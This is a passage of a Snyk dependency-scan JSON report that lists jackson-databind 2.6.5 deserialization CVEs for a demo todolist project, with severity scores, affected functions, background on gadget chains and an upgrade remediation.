prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2662)\n", + "epssDetails": { + "percentile": "0.81534", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10968" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-rf6r-2c4q-2vwg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-26T17:09:01.709397Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-26T14:55:20Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-26T14:55:20Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.576513Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561585", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2670", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-11113", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:18.889961Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:47.400473Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:21.749219Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.889961Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.400473Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.openjpa.ee.WASRegistryManagedRuntime` (aka openjpa).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2670)\n- [PoC](https://github.com/Al1ex/CVE-2020-11113)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11113" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-9vvp-fxw6-jcxr" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T08:36:41.369827Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:36Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:36Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.400473Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561586", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2664", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:44:29.297635Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:14.145935Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.628835Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:44:29.297635Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.145935Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadgets `org.apache.activemq.*` (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2664)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11111" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-v3xw-c963-f5hc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T09:28:18.821103Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:37Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.145935Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561587", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676", + "title": "GItHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2666", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:44:29.301384Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:14.113524Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:03.656527Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:44:29.301384Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.113524Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.commons.proxy.provider.remoting.RmiProvider` (aka apache/commons-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GItHub Commit](https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2666)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11112" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-58pp-9c76-5625" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T09:29:29.728517Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:37Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.113524Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564887", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2682", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:54.679784Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:17.073265Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.162608Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:54.679784Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:17.073265Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.jelly.impl.Embedded` (aka `commons-jelly`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2682)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.92404", + "probability": "0.04399", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11620" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-h4rc-386g-6m85" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-04-08T10:55:38.169333Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-04-08T00:42:23Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-04-08T00:42:23Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:17.073265Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564888", + "title": "Deserialization of Untrusted Data", + "CVSSv3": 